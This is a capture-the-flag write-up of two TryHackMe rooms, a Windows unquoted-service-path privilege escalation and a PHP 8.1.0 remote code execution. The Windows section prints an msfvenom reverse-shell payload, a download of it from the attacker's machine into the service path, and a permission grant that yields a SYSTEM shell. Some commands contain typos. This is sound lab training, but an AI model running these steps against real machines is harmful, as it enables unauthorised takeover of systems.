TryHackMe Challenges

Some vulnerable machines on TryHackMe

Written by: Jan Fok

TryHackMe logo

Quotient

Category: Windows, Privilege Escalation

Vulnerability: Unquoted Service Path

We are provided credentials for the user “Sage” to access a remote machine. We were told to use Remote Desktop Protocol (RDP) to connect to the remote machine. I used xfreerdp and the following command to accomplish this:

xfreerdp /u:sage /p:'[password]' /v:[machine ip]

Enumeration

Using the command systeminfo, we can obtain information about the system.

Using the net command, we can check the group memberships and account information of the user “Sage”. We can also use whoami /priv to check the privileges of the account.

From the results of these tests, we can conclude that “Sage” is a low-privileged account.

I was lost to as to what to do, so I read a couple writeups online and learned that from the name and the description of the challenge, there may be an Unquoted Service Path vulnerability on the system.

Next, I ran a service check using Windows Management Instrumentation Command-line (WMIC) using the following command:

wmic service get name,displayname,pathname,startmode | findstr /i /v "c:\windows\\" | findstr /i /v """

The first part of the command will return all the services running on the system. The second part of the command will remove any services which have been put in quotes.

This indeed returns an unquoted service path with the name “Development Service” in path C:\Program Files\ Development Files\Devservice Files\Service.exe.

Next, I used the following command to verify the status of the service.

sc qc "Development Service" -state=all

From the results of the command, we can see that the service is set to auto-start, meaning it will be automatically started on system boot/reboot.

After reading about how an unquoted service path works, I learned that the system will check for the executable in the following order:

  1. C:\Program.exe
  2. C:\Program Files\Development.exe
  3. C:\Program Files\Development Files\Devservice.exe
  4. C:\Program Files\Development Files\Devservice Files\Service.exe

We just have to see if we have permissions to write in any of the spaced folders in the filepath. We can check folder permissions using icalcs (Integrity Control Access Control LIsts) via the command-line using the following commands:

icacls "C:\Program Files\Development Files\Devservice Files"

icacls "C:\Program Files\Development Files"

From the results, we can see that we do have write access to the “Development Files” folder. Now, we can proceed with our exploitation.

Exploitation

We will use msfvenom to create a reverse shell executable on our local machine using the following command:

msfvenom -p windows/shell_reverse_tcp LHOST=[LOCAL IP] LPORT=443 -f exe -o Devservice.exe

Next, we start a web server using python to host the file with the following command:

python3 -m http.server

Then, we can use wget in the remote machine to download the file from our local machine to the target using the following command:

Powershell

wget http://local.machine.ip/8000/Devservice.exe -o "c:\program files\development files\Devservice.exe"

We once again use icacls to give all users permissions to run the script with the following command:

icacls "c:\program files\development files\Devservice.exe" \grant everyone:F

Now, we restart the target machine to get windows to auto-run the reverse shell script on boot. When the machine is rebooted, I obtained a reverse shell on my local machine with SYSTEM privileges and was able to obtain the flag from administrator desktop.

Flag

THM{USPE_SUCCESS}


Agent T

Category: WebApp, Privilege Escalation

Enumeration

When accessing the provided website with a web browser, I notice that there’s nothing special in teh actual html elements. However, when I inspect the HTTP request and response headers, I note that the PHP version was leaked - PHP 8.1.0.

Googling vulnerabilaties for that version of PHP, I found a vulnerability and script which allowed for remote code execution (RCE) readily available on ExploitDB.

Downloading the python script and running it, I managed to obtain a root shell into the server and obtained the flag in the root directory.

Flag

8flag{4127d0530abf16d6d23973e3df8dbecb}